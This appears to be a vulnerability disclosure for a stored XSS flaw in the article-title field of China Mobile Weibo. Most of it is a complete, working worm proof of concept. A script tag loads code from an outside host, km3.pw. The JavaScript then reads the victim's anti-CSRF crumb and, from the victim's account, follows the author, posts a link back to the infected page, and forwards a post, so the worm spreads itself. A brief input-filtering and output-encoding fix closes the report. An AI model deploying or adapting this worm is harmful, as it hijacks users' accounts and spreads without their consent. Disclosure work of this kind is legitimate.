China Mobile Weibo stored XSS worm (with worm POC)
1. Forwards a Weibo post
2. Publishes a new Weibo post
3. Follows ("listens to") my account
The problem lies in the long-post (article) feature of China Mobile Weibo.
The article title is not filtered, so up to 30 characters of code can be inserted into it.
<Script/src = // km3.pw> </script>
Affected page: http://weibo.10086.cn/cwb/article.php?id=10404
Once a user who is logged in to a China Mobile Weibo account opens this page, it forwards my Weibo post, publishes a new Weibo post, and follows my account.
POC:
// Worm payload from the disclosure above, reformatted for readability.
// It executes on the weibo.10086.cn origin inside the victim's session, so
// it can read /weibo.php and extract the anti-CSRF "crumb" itself; a
// per-request CSRF token does not protect against script running on the
// same origin.

// Pattern used to locate the anti-CSRF crumb (32 word characters) in the
// /weibo.php response.
var csrfIDExp = /crumb":"\w{32}/;
// Endpoint for publishing a new post.
var PostUrl = "/ajax/json/pushfeed/pushfeed";
// Page whose markup embeds the crumb.
var HomePage = "/weibo.php";
var CsrfToken = "";
// Follow ("listen to") endpoint for the author's user id; the crumb is
// appended to the query string.
var ShouTing = "/ajax/json/user/usercard/user_id=271843611?crumb=";
// Form body for the new post: percent-encoded text that ends with a link to
// the infected article page (article.php?id=10404). Every victim's timeline
// therefore re-advertises the payload -- this is the propagation step.
var PostData = "text=%E6%88%91%E5%88%9A%E5%8F%91%E8%A1%A8%E4%BA%86%E4%B8%80%E7%AF%87%E6%96%B0%E5%BE%AE%E5%8D%9A%E6%9D%A5%E7%9C%8B%E7%9C%8B%E5%90%A7%EF%BC%9Ahttp%3A%2F%2Fweibo.10086.cn%2Fcwb%2Farticle.php%3Fid%3D10404&from=home_top&list_id=&crumb=";
// Form body for forwarding feed 183420367929375 with a short percent-encoded
// comment.
var ZhuanData = "feedid=183420367929375&text=%E6%8C%BA%E4%B8%8D%E9%94%99%E7%9A%84&from=forward&reply_note=on&crumb=";
// Endpoint for forwarding an existing post.
var Zhuanfa = "/ajax/json/pushfeed/pushforward";

// Minimal asynchronous XHR helper. `callback` receives the response text
// only when readyState is 4 and status is 200; any other outcome is silently
// dropped (no error handling).
function Connection(Sendtype,url,content,callback){
  if (window.XMLHttpRequest){
    var xmlhttp=new XMLHttpRequest();
  }else{
    // Legacy IE fallback.
    var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
  xmlhttp.onreadystatechange=function(){
    if(xmlhttp.readyState==4&&xmlhttp.status==200){
      callback(xmlhttp.responseText);
    }
  }
  xmlhttp.open(Sendtype,url,true);
  // Sent for GET requests as well, even though they carry no body.
  xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  xmlhttp.send(content);
}

// Step 1: fetch the home page and pull the crumb out of its markup.
// If the pattern does not match, exec() returns null, String(null) is "null"
// and CsrfToken becomes the literal string "null".
Connection("GET",HomePage,"",function(callback){
  CsrfToken = String(csrfIDExp.exec(callback)).replace('crumb":"','');
  // Step 2: the three actions (follow, post, forward) are fired at once with
  // the harvested crumb; the callbacks are empty, so nothing is checked.
  // From a detection standpoint, a burst of identical posts/forwards from
  // many accounts within seconds is the observable signature of this worm.
  Connection("GET",ShouTing+CsrfToken,"",function(callback){})
  Connection("POST",PostUrl,PostData+CsrfToken,function(callback){})
  Connection("POST",Zhuanfa,ZhuanData+CsrfToken,function(callback){})
})
Posting, forwarding and following on Weibo all require a CSRF token, which is easily obtained from /weibo.php: because the injected script runs on the same origin, it can simply fetch that page and read the token out of it.
The effect is as follows:
Please watch the video: http://km3.pw/10086women.mp4
Solution:
Filter the title on input and encode it on output, using a whitelist in preference to a blacklist.